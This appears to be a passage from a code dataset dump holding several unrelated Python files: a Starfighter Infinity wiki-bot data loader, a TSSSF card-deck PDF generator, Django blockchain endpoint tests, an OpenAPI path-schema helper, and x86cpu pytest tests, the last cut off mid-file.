content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import json
import os
import re
import time
import requests
import js2py
from diskcache import Cache
from SFIWikiBotLib import Config
from SFIWikiBotLib import GeneralUtils
dataCache = Cache(directory=os.path.join(Config.cacheDir, 'cache.gameData'))
# Found at https://darty11.github.io/common.js
# //very expensive function used to fix a bug in the game that prevents engine ranges from containing their items.
# function fixEngines(weaponRanges, weaponData){
# for(rangeId in weaponRanges){
# var range = weaponRanges[rangeId];
# if(range.items.length == 0 && (range.type == 0 || range.type == 4)){
# var id = range.id;
# for(weaponId in weaponData){
#
# if(weaponId.startsWith(id+"_") || weaponId==id){
# var index = 0;
# var end = weaponId.replace(id+"_"," ");
# if(!isNaN(end)){
# index = end;
# }
# range.items[Number(index)] = weaponId;
# weaponData[weaponId].range = range;
# }
# }
# }
# }
# }
def LoadItemDataFromPublicStarfighterWebsite():
    """Return the public-site item list with each item's embedded JSON parsed.

    Each web record stores its item definition as a JSON string in its 'json'
    field (with doubled double-quotes as an escape). That string is parsed,
    blanked out on the web record, and the web record itself is attached to
    the parsed item under the '__extData' key.
    """
    webItemList = LoadDataFromPublicStarfighterWebsite()['itemList']
    parsedItems = []
    for webItem in webItemList:
        parsedItem = json.loads(webItem['json'].replace('""', '\"'))
        webItem['json'] = ''
        parsedItem['__extData'] = webItem
        parsedItems.append(parsedItem)
    return parsedItems
def LoadShipDataFromPublicStarfighterWebsite():
    """Return the public-site ship list, enriched with turret data.

    Ships whose (lower-cased) name appears in ShipUtils.shipTurretMapping get
    a 'turrets' entry copied from that mapping; every ship is returned.
    """
    from SFIWikiBotLib import ShipUtils
    ships = []
    for shipRecord in LoadDataFromPublicStarfighterWebsite()['shipList']:
        turretKey = shipRecord['name'].lower()
        if turretKey in ShipUtils.shipTurretMapping:
            shipRecord['turrets'] = ShipUtils.shipTurretMapping[turretKey]
        ships.append(shipRecord)
    return ships
def RefreshPublicData():
    """Force-refresh the cached public-website dataset.

    Calls the undecorated function via ``__wrapped__`` (bypassing the
    diskcache memoize layer) and writes the fresh result back into the cache
    under the same key the memoize decorator uses.
    """
    data = LoadDataFromPublicStarfighterWebsite.__wrapped__()
    dataCache.set(('DataLoader.LoadDataFromPublicStarfighterWebsite',), data, expire=Config.publicDatabaseContentTtl)
def RefreshPrivateData():
    """Force-refresh every cached private (BenOlding) dataset.

    Each loader is invoked via ``__wrapped__`` to bypass its diskcache
    memoization, and the fresh result is written back under the cache key the
    memoize decorator uses ('DataLoader.<function name>',).
    """
    refreshTargets = (
        LoadWeaponDataFromBenOldingWebsite,
        LoadWeaponRangesDataFromBenOldingWebsite,
        LoadWeaponVariantDataFromBenOldingWebsite,
        LoadWeaponCraftableDataFromBenOldingWebsite,
        LoadShipDataFromBenOldingWebsite,
        LoadSystemDataFromBenOldingWebsite,
        LoadGateDataFromBenOldingWebsite,
        LoadConstantsData,
    )
    for loader in refreshTargets:
        freshData = loader.__wrapped__()  # bypass the memoize cache
        dataCache.set(('DataLoader.' + loader.__name__,), freshData, expire=Config.privateDatabaseContentTtl)
# Matches a JSONP payload of the form callback("name", <json>); group 2 is
# the raw JSON argument.
jsonpRegex = re.compile(r'.*?\(\s*(["\']).*?\1\s*,\s*(.*)\)', re.S)
def LoadDataFromBenOldingJsonp(dataType):
    """Fetch one JSONP dataset from the private benoldinggames URL.

    :param dataType: dataset name substituted into the URL template
        (e.g. 'weapons', 'ranges', 'ships').
    :return: the parsed JSON payload, or None on HTTP error or when the
        response does not look like JSONP.
    """
    url = Config.privateDataUrlTemplate
    if '?' not in url:
        url += '?cb={}'  # cache-busting timestamp parameter
    response = requests.get(url.format(dataType, time.time()))
    if response.status_code != 200:
        print("Got", response.status_code, 'trying to read content from benoldinggames.co.uk for', dataType)
        return None
    m = jsonpRegex.match(response.text)
    if m is None:
        # Fix: previously fell through to m.group(2) and raised
        # AttributeError whenever the payload was not JSONP-shaped.
        print('Unexpected (non-JSONP) response from benoldinggames.co.uk for', dataType)
        return None
    return json.loads(m.group(2))
# Thin disk-cached wrappers around LoadDataFromBenOldingJsonp, one per
# dataset. diskcache's memoize keys each result on the function name, which
# is why RefreshPrivateData() can overwrite these entries directly.
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponDataFromBenOldingWebsite():
    """Cached fetch of the 'weapons' dataset."""
    return LoadDataFromBenOldingJsonp('weapons')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponRangesDataFromBenOldingWebsite():
    """Cached fetch of the 'ranges' (weapon range groups) dataset."""
    return LoadDataFromBenOldingJsonp('ranges')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponVariantDataFromBenOldingWebsite():
    """Cached fetch of the 'variant_ranges' dataset."""
    return LoadDataFromBenOldingJsonp('variant_ranges')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadWeaponCraftableDataFromBenOldingWebsite():
    """Cached fetch of the 'craftable' dataset."""
    return LoadDataFromBenOldingJsonp('craftable')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadShipDataFromBenOldingWebsite():
    """Cached fetch of the 'ships' dataset."""
    return LoadDataFromBenOldingJsonp('ships')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadSystemDataFromBenOldingWebsite():
    """Cached fetch of the 'systems' dataset."""
    return LoadDataFromBenOldingJsonp('systems')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadGateDataFromBenOldingWebsite():
    """Cached fetch of the 'gates' dataset."""
    return LoadDataFromBenOldingJsonp('gates')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadMineralDataFromBenOldingWebsite():
    """Cached fetch of the 'minerals' dataset."""
    return LoadDataFromBenOldingJsonp('minerals')
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadConstantsData():
    """Fetch and bundle the game's constant/lookup tables into one dict.

    Combines the 'races', 'effects', 'skills' and 'orgs' datasets with the
    individual lookup lists contained in the 'lookup' dataset. Result is
    disk-cached for Config.privateDatabaseContentTtl seconds.
    """
    rtnData = {}
    rtnData['raceData'] = LoadDataFromBenOldingJsonp('races')
    rtnData['effectsData'] = LoadDataFromBenOldingJsonp('effects')
    rtnData['skillsData'] = LoadDataFromBenOldingJsonp('skills')
    rtnData['orgData'] = LoadDataFromBenOldingJsonp('orgs')
    lookup = LoadDataFromBenOldingJsonp('lookup')
    rtnData['guidanceLookup'] = lookup['guidance']
    rtnData['fireSideLookup'] = lookup['fireSide']
    rtnData['typeLookup'] = lookup['type']
    # The upstream data misspells 'Extraction' as 'Extaction'; normalize it.
    rtnData['damageTypeLookup'] = [ v.replace('Extaction', 'Extraction') for v in lookup['damageType'] ]
    rtnData['effectLookup'] = lookup['effect']
    rtnData['augTypeLookup'] = lookup['augType']
    rtnData['weaponTypeLookup'] = lookup['weaponType']
    rtnData['spawnTypeLookup'] = lookup['spawnType']
    rtnData['sectorTypeLookup'] = lookup['sectorType']
    rtnData['extraTypeLookup'] = lookup['extraType']
    return rtnData
@dataCache.memoize(expire=Config.publicDatabaseContentTtl)
def LoadDataFromPublicStarfighterWebsite():
    """Scrape the public database page and return its ship and item lists.

    The page embeds its data as inline JavaScript ('var data = {};' up to
    'var showing = null;'); that script fragment is extracted with a regex,
    wrapped in a getData() function, and executed with js2py to recover the
    'data' object. Returns {'shipList': [...], 'itemList': [...]}.
    """
    content = ''
    try:
        # cb= is a cache-busting timestamp query parameter.
        response = requests.get('{}?cb={}'.format(Config.publicDatabaseUrl, time.time()))
        response.raise_for_status()
    except requests.exceptions.HTTPError as http_err:
        print('HTTP error occurred: {}'.format(http_err))
    except Exception as err:
        print('HTTP error occurred: {}'.format(err))
    else:
        content = response.text
    # NOTE(review): if the request failed, content stays '' and js2py will be
    # run on an empty wrapper -- the failure surfaces downstream.
    jsStr = re.sub(r'.*?(var data = \{\};.*)var showing = null;.*', '\\1', content, 0, re.S)
    jsContent = 'function getData(){\n' + jsStr + '\nreturn data;\n}'
    getData = js2py.eval_js(jsContent)
    jsData = getData()
    return {
        'shipList': jsData['Ships'].to_list(),
        'itemList': jsData['Items'].to_list()
    }
@dataCache.memoize(expire=Config.privateDatabaseContentTtl)
def LoadObjectDataFromPrivateStarfighterWebsite():
    """Scrape the private object-list HTML page into categorized object dicts.

    Each object card on the page is parsed into {'name', 'statsData',
    'imageUrl'} and sorted into one of the returned lists (objectList,
    planetList, anomalyList, relicList, structureList, unknownList) based on
    its 'Type' stat. Cards that fail to parse (including cards with no
    'Type' stat) are silently skipped by the broad except below.
    """
    from SFIWikiBotLib import GalaxyUtils
    content = ''
    try:
        response = requests.get('{}?cb={}'.format(Config.privateObjectListUrl, time.time()))
        response.raise_for_status()
    except requests.exceptions.HTTPError as http_err:
        print('HTTP error occurred: {}'.format(http_err))
    except Exception as err:
        print('HTTP error occurred: {}'.format(err))
    else:
        content = response.text
    # Image paths on the page are relative to the page's own directory.
    imgBaseUrl = Config.privateObjectListUrl
    imgBaseUrl = imgBaseUrl.replace(os.path.basename(imgBaseUrl), '')
    rtnData = {
        'objectList': [],
        'planetList': [],
        'anomalyList': [],
        'relicList': [],
        'structureList': [],
        'unknownList': [],
    }
    # One chunk per object card; the first chunk is pre-card page markup and
    # will fail the regex match, landing in the except below.
    objectHtmlList = content.split('<div class="box" style="height:600px;overflow:hidden">')
    objectSectionsRegex = re.compile('.*?<h2>(.*?)</h2>.*?<p>(.*?)</p>(.*?)</div>', re.S)
    objectStatsRegex = re.compile('.*?<b>([^:]*):\s*</b>(.*?)(</span>)?<br />((?=<)|$)', re.S)
    objectImageUrlRegex = re.compile('.*?<img src="(.*?)"', re.S)
    objectList = []
    for objectHtml in objectHtmlList:
        sectionsMatch = objectSectionsRegex.match(objectHtml)
        try:
            object = {}  # NOTE(review): shadows the builtin 'object'
            object['name'] = sectionsMatch.group(1)
            object['statsData'] = {}
            object['imageUrl'] = None
            statsContent = sectionsMatch.group(2)
            statsMatch = objectStatsRegex.match(statsContent)
            # Consume one "<b>Stat:</b> value<br />" pair per iteration,
            # removing the matched text so the next pair matches from the top.
            while statsMatch:
                object['statsData'][statsMatch.group(1).strip()] = statsMatch.group(2).strip()
                statsContent = statsContent.replace(statsMatch.group(0), '')
                statsMatch = objectStatsRegex.match(statsContent)
            imageMatch = objectImageUrlRegex.match(sectionsMatch.group(3))
            if imageMatch:
                object['imageUrl'] = "{}{}".format(imgBaseUrl, imageMatch.group(1))
            # Categorize by the 'Type' stat; a missing 'Type' raises KeyError
            # and the card is dropped by the except handler.
            if object['statsData']['Type'] == 'Object' or object['statsData']['Type'] == 'Objects':
                rtnData['objectList'].append(object)
            elif object['statsData']['Type'] in GalaxyUtils.planetTypeLookup:
                rtnData['planetList'].append(object)
            elif object['statsData']['Type'] == 'Anomaly':
                rtnData['anomalyList'].append(object)
            elif object['statsData']['Type'] == 'Relic':
                rtnData['relicList'].append(object)
            elif object['statsData']['Type'] == 'Structure':
                rtnData['structureList'].append(object)
            else:
                rtnData['unknownList'].append(object)
        except Exception as e:
            # Deliberate best-effort: unparseable chunks are skipped.
            pass
    return rtnData
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Master Game Gen
1.0b
'''
import os
import sys
import json
from OS_Helper import CleanDirectory, BuildPage, BuildBack
#TSSSF Migration TODO:
#automagickally create vassal module :D
#individual artist naming
#.pon files have symbols like {ALICORN} and so on.
def load_cards_file(path, save_tsssf_converted=True):
    """Load a card deck file (new .json format or legacy .pon format).

    Python 2 code. Returns (module, data) where module is the card-rendering
    module named inside the file (imported dynamically) and data is the deck
    dict with 'cards' already unpacked and filtered to the focused subset.
    Legacy TSSSF .pon files are optionally re-saved as .json next to the
    original when save_tsssf_converted is true.
    """
    path = os.path.abspath(path)
    # Directory layout is <game>/<card_set>/<file>; recover both names.
    card_set = os.path.split(os.path.dirname(path))[1]
    game_folder = os.path.dirname(os.path.dirname(path))
    game = os.path.split(game_folder)[1]
    with open(path, 'rb') as fp:
        if path.endswith('.json'):
            # new json format
            data = json.loads(fp.read().decode('utf-8-sig', 'replace'))
            module = __import__(data['module'])
        else:
            # old pon format: first line names the module, the rest are
            # one-card-per-line entries; '#', ';', '/' start comment lines.
            first_line = fp.readline().decode('utf-8-sig', 'replace').strip()
            module = __import__(first_line)
            data = {'module': first_line, 'cards': []}
            # convert to new format
            convert_line = getattr(module, 'convert_line', None)
            for line in fp:
                line = line.decode('utf-8', 'replace').strip()
                if not line or line[0] in ('#', ';', '/'):
                    continue
                line = line.replace(r'\r', '')
                if convert_line:
                    line = convert_line(line)
                data['cards'].append(line)
    data['game'] = game
    data['card_set'] = card_set
    # prepare cards
    data['cards'] = unpack_card_group(data['cards'], data.get('default'))
    data['cards'] = select_focused_cards(data['cards'])
    if not path.endswith('.json') and save_tsssf_converted and data['module'] == 'TSSSF_CardGen':
        print 'Converting to new format!'
        jsonpath = os.path.splitext(path)[0] + '.json'
        if os.path.exists(jsonpath):
            raise Exception("json file exists, cannot convert")
        with open(jsonpath, 'wb') as fp:
            fp.write(fancy_json_cards(data).encode('utf-8'))
    return module, data
def unpack_card_group(cards, group=None):
    """Flatten nested card groups into a flat list of card dicts.

    A card containing both 'group' and 'cards' keys is a nested group: its
    'group' settings are merged onto the inherited settings and applied to
    its children recursively. For keys in union_dicts the dict values are
    merged (child entries override); every other key is simply replaced.
    """
    union_dicts = ('fonts', 'colors', 'anchors', 'anchors_offset', 'leading')
    inherited = group if group else {}

    def merge(base, overrides):
        # Overlay `overrides` onto a copy of `base`, dict-merging the
        # union_dicts keys instead of replacing them wholesale.
        merged = dict(base)
        for key, value in overrides.items():
            if key in union_dicts and key in merged:
                combined = merged[key].copy()
                combined.update(value)
                merged[key] = combined
            else:
                merged[key] = value
        return merged

    flattened = []
    for card in cards:
        if 'group' in card and 'cards' in card:
            flattened.extend(unpack_card_group(card['cards'], merge(inherited, card['group'])))
        else:
            flattened.append(merge(inherited, card))
    return flattened
def select_focused_cards(cards):
    """Return the enabled cards marked 'focus'; if none, all enabled cards.

    'disable' excludes a card in either case. With no focused cards the
    whole enabled deck is returned, so focusing is opt-in.
    """
    enabled = [card for card in cards if not card.get('disable')]
    focused = [card for card in enabled if card.get('focus')]
    return focused if focused else enabled
def fancy_json_cards(data):
    """Serialize deck data as pretty JSON with card tags in canonical order.

    Only the tags in taglist are kept, emitted in taglist order; everything
    else on a card is dropped. Output is indent-1 JSON with module first.
    """
    from collections import OrderedDict
    taglist = ('type', 'picture', 'symbols', 'title', 'keywords', 'body', 'flavor', 'expansion', 'client')
    ordered_cards = [
        OrderedDict((tag, card[tag]) for tag in taglist if tag in card)
        for card in data['cards']
    ]
    payload = OrderedDict([('module', data['module']), ('cards', ordered_cards)])
    return json.dumps(payload, sort_keys=False, indent=1, ensure_ascii=False)
def load_translation_files(folder, card_set, module):
    # Custom translations: using translation.json file from card set folder and from game folder
    """Apply translation.json overrides from the game and card-set folders.

    The card-set file is loaded second, so its values win over the
    game-level file. Mutates `module` in place (RulesDict is updated,
    CopyrightString and ARTIST are replaced). Returns the number of
    translation files that were found and applied.
    """
    count = 0
    for tpath in (os.path.join(folder, 'translation.json'), os.path.join(folder, card_set, 'translation.json')):
        if not os.path.isfile(tpath):
            continue
        with open(tpath, 'rb') as fp:
            translation = json.loads(fp.read().decode('utf-8-sig', 'replace'))
        count += 1
        if 'RulesDict' in translation:
            module.RulesDict.update(translation['RulesDict'])
        if 'CopyrightString' in translation:
            module.CopyrightString = translation['CopyrightString']
        if 'ArtArtist' in translation:
            module.ARTIST = translation['ArtArtist']
    return count
def build_cards(module, data):
    """Render every card in the deck and assemble printable page images.

    Python 2 code. Configures the rendering `module` (paths, card set), renders
    front and back images for each card, and groups them into grid pages via
    BuildPage/BuildBack. The final partial page is padded with BLANK cards.
    Returns (workspace_path, output_folder) for the PDF step.
    """
    module.CardSet = data['card_set']
    card_set_path = os.path.join(data['game'], data['card_set'])
    if 'resources' in data and getattr(module, 'LoadResources', None):
        module.LoadResources(data['resources'])
    # Create workspace for card images
    workspace_path = CleanDirectory(path=card_set_path, mkdir="workspace", rmstring="*.*")
    module.workspace_path = workspace_path
    # Create image directories
    bleed_path = CleanDirectory(path=card_set_path, mkdir="bleed-images", rmstring="*.*")
    module.BleedsPath = bleed_path
    cropped_path = CleanDirectory(path=card_set_path, mkdir="cropped-images", rmstring="*.*")
    module.CropPath = cropped_path
    vassal_path = CleanDirectory(path=card_set_path, mkdir="vassal-images", rmstring="*.*")
    module.VassalPath = vassal_path
    # Create output directory
    output_folder = CleanDirectory(path=data['game'], mkdir=data['card_set'], rmstring="*.pdf")
    module.CardSetPath = output_folder
    # Page layout: deck-level 'pdf' settings override the module defaults.
    pdf = data.get('pdf', {})
    page_params = {'extension': pdf.get('pages_extension', 'png')}
    if 'dpi' in pdf:
        page_params['dpi'] = pdf['dpi']
    if 'cut_line_width' in pdf:
        page_params['cut_line_width'] = pdf['cut_line_width']
    if 'page' in pdf:
        page_params['page_width'] = pdf['page'][0]
        page_params['page_height'] = pdf['page'][1]
    if 'grid' in pdf:
        page_params['grid_width'] = pdf['grid'][0]
        page_params['grid_height'] = pdf['grid'][1]
    else:
        page_params['grid_width'] = module.PAGE_WIDTH
        page_params['grid_height'] = module.PAGE_HEIGHT
    cards_per_page = page_params['grid_width'] * page_params['grid_height']
    # Make pages
    card_list = []
    back_list = []
    page_num = 0
    count = len(data['cards'])
    for index, card in enumerate(data['cards'], 1):
        label = card.get('title') or card.get('picture') or card.get('type')
        print '[{}/{}] {}'.format(index, count, label.replace('\n', ' ').encode(sys.stdout.encoding, 'replace'))
        card_list.append(module.BuildCard(card))
        back_list.append(module.BuildBack(card))
        # If the card_list is big enough to make a page
        # do that now, and set the card list to empty again
        if len(card_list) >= cards_per_page:
            page_num += 1
            print "Building Page {}...".format(page_num)
            BuildPage(card_list, page_num, workspace_path, **page_params)
            BuildBack(back_list, page_num, workspace_path, **page_params)
            card_list = []
            back_list = []
    # If there are leftover cards, fill in the remaining
    # card slots with blanks and gen the last page
    if len(card_list) > 0:
        # Fill in the missing slots with blanks
        while len(card_list) < cards_per_page:
            card_list.append(module.BuildCard({"type": "BLANK"}))
            back_list.append(module.BuildCard({"type": "BLANK"}))
        page_num += 1
        print "Building Page {}...".format(page_num)
        BuildPage(card_list, page_num, workspace_path, **page_params)
        BuildBack(back_list, page_num, workspace_path, **page_params)
    #Build Vassal
    module.CompileVassalModule()
    return workspace_path, output_folder
def generate_pdf(workspace_path, output_folder, card_set):
    """Combine the rendered page images into front and back PDFs.

    Python 2 code. Shells out to ImageMagick 'convert': a bundled
    imagemagick\\convert.exe on Windows, the system 'convert' elsewhere.
    page_*.* images become <card_set>.pdf and backs_*.* become
    backs_<card_set>.pdf in output_folder.
    """
    if sys.platform == 'win32':
        print "\nCreating PDF (Windows)..."
        if os.path.isfile(r'imagemagick\convert.exe'):
            # on windows it working only with ascii path
            os.system(ur'imagemagick\convert.exe "{}/page_*.*" "{}/{}.pdf"'.format(
                workspace_path.decode('utf-8'),
                output_folder,
                card_set
            ))
            print "\nCreating PDF of backs..."
            os.system(ur'imagemagick\convert.exe "{}/backs_*.*" "{}/backs_{}.pdf"'.format(
                workspace_path.decode('utf-8'),
                output_folder,
                card_set
            ))
            print "Done!"
        else:
            print "Please download and unpack ImageMagick for Windows into imagemagick directory"
            print "PDF was not created"
    else:
        print "\nCreating PDF (*nix)..."
        os.system(ur'convert "{}/page_*.*" "{}/{}.pdf"'.format(
            workspace_path.decode('utf-8'),
            output_folder,
            card_set
        ).encode('utf-8'))
        print "\nCreating PDF of backs..."
        os.system(ur'convert "{}/backs_*.*" "{}/backs_{}.pdf"'.format(
            workspace_path.decode('utf-8'),
            output_folder,
            card_set
        ).encode('utf-8'))
        print "Done!"
def main(folder=".", filepath="deck.cards"):
    """Full pipeline: load a deck file, render its cards, and produce PDFs.

    Python 2 code: str arguments (bytes) are decoded to unicode first so the
    rest of the pipeline works with unicode paths.
    """
    if isinstance(folder, str):
        folder = folder.decode('utf-8', 'replace')
    if isinstance(filepath, str):
        filepath = filepath.decode('utf-8', 'replace')
    module, data = load_cards_file(os.path.join(folder, filepath))
    load_translation_files(data['game'], data['card_set'], module)
    workspace_path, output_folder = build_cards(module, data)
    generate_pdf(workspace_path, output_folder, data['card_set'])
if __name__ == '__main__':
    # One deck is built per run; swap which main(...) call is uncommented to
    # select the target card set.
    #main('TSSSF', '1.1.0 Patch/cards.pon')
    #main('TSSSF', '2014 Con Exclusives/cards.pon')
    #main('TSSSF', 'BABScon 2015/cards.pon')
    #main('TSSSF', 'Core 1.0.5/cards.pon')
    #main('TSSSF', 'Core 1.0.5 Delta/cards.pon')
    #main('TSSSF', 'Core 1.1.0/cards.pon')
    #main('TSSSF', 'Core 1.1.0 Test/cards.pon')
    #main('TSSSF', 'Custom Card for/cards.pon')
    #main('TSSSF', 'Extra Credit 0.10.4/cards.pon')
    main('TSSSF', 'Indiegogo/cards.json')
    #main('TSSSF', 'Patreon Expansion 1/cards.pon')
    #main('TSSSF', 'Ponycon Panel 2015/cards.pon')
    #main('TSSSF', 'Ponyville University 0.0.2/cards.pon')
    #main('TSSSF', 'Ponyville University 1.0.1/cards.pon')
    #main('TSSSF', 'Ponyville University 1.0.2/cards.pon')
    #main('TSSSF', 'Thank You/cards.pon')
    #main('BaBOC', 'BaBOC 0.1.0/deck.cards')
|
from django.core.exceptions import ValidationError
from django.test import TestCase
from .models import Block, Transaction
class TestViewAddTransaction(TestCase):
    """Tests for the /chain/add_transaction/ endpoint.

    Responses are JSON with an 'OK' flag and, on validation failure, a
    'message' dict keyed by field name with a list of error strings.
    """
    def setUp(self) -> None:
        # No fixtures needed; each test posts its own payload.
        pass
    def test_add_transaction_true_1(self):
        """A well-formed transaction (34-char addresses) is accepted with 200."""
        data = {
            "sender":"0123456789012345678901234567890123",
            "receiver":"0123456789012345678901234567890124",
            "value":10,
            "timestamp":"2000-01-01T20:20"
        }
        res = self.client.post('/chain/add_transaction/', data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 200)
        self.assertTrue(res_json['OK'])
    def test_required_field_false_1(self):
        """An empty payload yields 400 with a required-field error per field."""
        data = {
        }
        res = self.client.post('/chain/add_transaction/', data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 400)
        self.assertFalse(res_json['OK'])
        self.assertEqual(res_json['message']['sender'][0], 'This field is required.')
        self.assertEqual(res_json['message']['receiver'][0], 'This field is required.')
        self.assertEqual(res_json['message']['value'][0], 'This field is required.')
        self.assertEqual(res_json['message']['timestamp'][0], 'This field is required.')
    def test_validate_receiver_sender_false_2(self):
        """33-char addresses fail validation for both sender and receiver."""
        data = {
            "sender":"012345678901234567890123456789012",
            "receiver":"012345678901234567890123456789012",
            "value":10,
            "timestamp":"2000-01-01T20:20"
        }
        res = self.client.post('/chain/add_transaction/', data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 400)
        self.assertFalse(res_json['OK'])
        self.assertEqual(res_json['message']['sender'][0], 'sender address is invalid.')
        self.assertEqual(res_json['message']['receiver'][0], 'receiver address is invalid.')
class TestViewAddBlock(TestCase):
    """Tests for the /chain/add_block/ endpoint.

    setUp seeds four transactions (ids 1-4). Helper methods (no 'test_'
    prefix, so not collected directly) build a valid chain; the test methods
    compose them with failure scenarios.
    """
    def setUp(self) -> None:
        # Four identical transactions; only their auto-assigned ids (1..4)
        # matter to the block tests below.
        Transaction.objects.create(
            sender="0123456789012345678901234567890123",
            receiver="0123456789012345678901234567890124",
            value=10,
            timestamp="2000-01-01T20:20"
        )
        Transaction.objects.create(
            sender="0123456789012345678901234567890123",
            receiver="0123456789012345678901234567890124",
            value=10,
            timestamp="2000-01-01T20:20"
        )
        Transaction.objects.create(
            sender="0123456789012345678901234567890123",
            receiver="0123456789012345678901234567890124",
            value=10,
            timestamp="2000-01-01T20:20"
        )
        Transaction.objects.create(
            sender="0123456789012345678901234567890123",
            receiver="0123456789012345678901234567890124",
            value=10,
            timestamp="2000-01-01T20:20"
        )
    def true_init_add_block(self):
        """Helper: add a valid genesis block (empty prev_block) with 3 txns."""
        data = {
            "hash_block":"0123456789012345678901234567890123",
            "prev_block":"",
            "transactions":[1,2,3],
            "timestamp":"2000-01-01T20:20",
            "difficulty":1,
            "nonce":1
        }
        res = self.client.post("/chain/add_block/", data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 200)
        self.assertTrue(res_json['OK'])
        blocks = Block.objects.all()
        self.assertEqual(len(blocks), 1)
        self.assertEqual(len(blocks[0].transactions.all()), 3)
    def true_second_add_block(self):
        """Helper: add a valid second block chained to block 1 with txn 4."""
        data = {
            "hash_block":"0123456789012345678901234567890124",
            "prev_block":"1",
            "transactions":[4],
            "timestamp":"2000-01-01T20:30",
            "difficulty":1,
            "nonce":10
        }
        res = self.client.post("/chain/add_block/", data=data)
        self.assertEqual(res.status_code, 200)
        res_json = res.json()
        self.assertTrue(res_json['OK'])
        block:Block = Block.objects.get(id=2)
        self.assertIsNotNone(block)
        self.assertEqual(len(block.transactions.all()), 1)
    def false_init_add_block(self):
        # Placeholder helper: invalid-genesis scenario not yet implemented.
        pass
    def false_second_transaction_add_block(self):
        # Placeholder helper: invalid-second-block scenario not yet implemented.
        pass
    def test_add_block_true_1(self):
        """Happy path: genesis block followed by a chained second block."""
        self.true_init_add_block()
        self.true_second_add_block()
    def test_init_block_false_1(self):
        """A genesis block referencing a nonexistent prev_block is rejected."""
        data = {
            "hash_block":"0123456789012345678901234567890123",
            "prev_block":"1",
            "transactions":[1,2,3],
            "timestamp":"2000-01-01T20:20",
            "difficulty":1,
            "nonce":1
        }
        res = self.client.post("/chain/add_block/", data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 400)
        self.assertFalse(res_json['OK'])
        blocks = Block.objects.all()
        self.assertEqual(len(blocks), 0)
    def test_second_block_false_1(self):
        """Reusing a transaction already in block 1 rejects the new block."""
        self.true_init_add_block()
        data = {
            "hash_block":"0123456789012345678901234567890124",
            "prev_block":"1",
            "transactions":[1],
            "timestamp":"2000-01-01T20:30",
            "difficulty":1,
            "nonce":10
        }
        res = self.client.post("/chain/add_block/", data=data)
        res_json = res.json()
        self.assertEqual(res.status_code, 400)
        self.assertFalse(res_json['OK'])
        block:Block = Block.objects.filter(id=2).first()
        self.assertIsNone(block)
|
from typing import List
from django.urls.converters import (
IntConverter,
StringConverter,
)
def path_schema(params) -> List:
    """Generate OpenAPI path-parameter schema entries.

    `params` is expected to be an indexable sequence whose element at index 3
    maps parameter names to Django URL converter instances (TODO: confirm
    against caller). IntConverter maps to 'integer'; everything else,
    including StringConverter, maps to 'string'. Missing index 3 yields [].
    """
    schema_items = []
    try:
        converters = params[3].items()
    except IndexError:
        return schema_items
    for name, converter in converters:
        param_type = 'integer' if isinstance(converter, IntConverter) else 'string'
        schema_items.append({
            'in': 'path',
            'name': name,
            # 'required': True, # fixme
            'schema': {
                'type': param_type,
            }
        })
    return schema_items
|
""" Testing cpuid module
"""
from sys import platform as PLATFORM, path
from os.path import dirname
path.append(dirname(__file__))
from itertools import product
from x86cpu import info, cpuid
from x86cpu.cpuinfo import _bit_mask, _has_bit
import pytest
from info_getters import (Missing, get_sysctl_cpu, get_proc_cpuinfo,
get_wmic_cpu)
pytestmark = pytest.mark.skipif(
PLATFORM not in ('darwin', 'win32') and
not PLATFORM.startswith('linux'),
reason='Valid platforms are OSX, Windows, Linux')
REF_INFO = {}
def setup_module():
    """Populate REF_INFO with platform-specific reference CPU data.

    Uses sysctl on macOS, /proc/cpuinfo on Linux, and wmic on Windows; the
    module-level skipif should prevent any other platform reaching the
    RuntimeError below.
    """
    global REF_INFO
    if PLATFORM == 'darwin':
        REF_INFO.update(get_sysctl_cpu())
    elif PLATFORM.startswith('linux'):
        REF_INFO.update(get_proc_cpuinfo())
    elif PLATFORM == 'win32':
        REF_INFO.update(get_wmic_cpu())
    else:
        raise RuntimeError('Was not intending to test platform ' +
                           PLATFORM)
def test_against_ref():
    """Compare cpuid-derived `info` against the OS-reported reference data.

    Attributes and feature flags are only checked when the reference source
    actually reported them (Missing / unknown_flags entries are skipped).
    """
    assert info.vendor == REF_INFO['vendor']
    for attr_name in ('extended_family', 'extended_model', 'stepping',
                      'model_display', 'family_display', 'signature',
                      'supports_avx', 'supports_avx2'):
        if attr_name in REF_INFO and REF_INFO[attr_name] is not Missing:
            assert getattr(info, attr_name) == REF_INFO[attr_name]
    for feature in ('sse', 'sse2', 'sse3', 'mmx', '3dnow', 'sse4_1', 'sse4_2'):
        # Flags the reference source could not classify are not comparable.
        if feature in REF_INFO['unknown_flags']:
            continue
        has_feature = feature in REF_INFO['flags']
        assert (getattr(info, 'has_' + feature) == has_feature)
def set_bits(bits):
    """Return the integer formed by summing 2**b for every b in `bits`."""
    return sum(2 ** bit for bit in bits)
def test_bitmask():
    """_bit_mask(lo, hi) must have exactly bits lo..hi (inclusive) set."""
    for lo in range(32):
        for hi in range(lo + 1, 32):
            expected = set_bits(range(lo, hi + 1))
            assert _bit_mask(lo, hi) == expected
def test_has_bit():
    """Spot-check _has_bit, then exhaust all single-bit values up to 2**31."""
    # Hand-picked cases covering low bits, zero, and a high bit.
    assert _has_bit(1, 0)
    assert _has_bit(3, 0)
    assert _has_bit(3, 1)
    assert not _has_bit(0, 2)
    assert not _has_bit(0, 1)
    assert _has_bit(128, 7)
    assert not _has_bit(128, 0)
    # Every single-bit value has its own bit set and no other.
    for bit, no_bit in product(range(32), range(32)):
        val = 2 ** bit
        assert _has_bit(val, bit)
        if bit != no_bit:
            assert not _has_bit(val, no_bit)
def test_smoke():
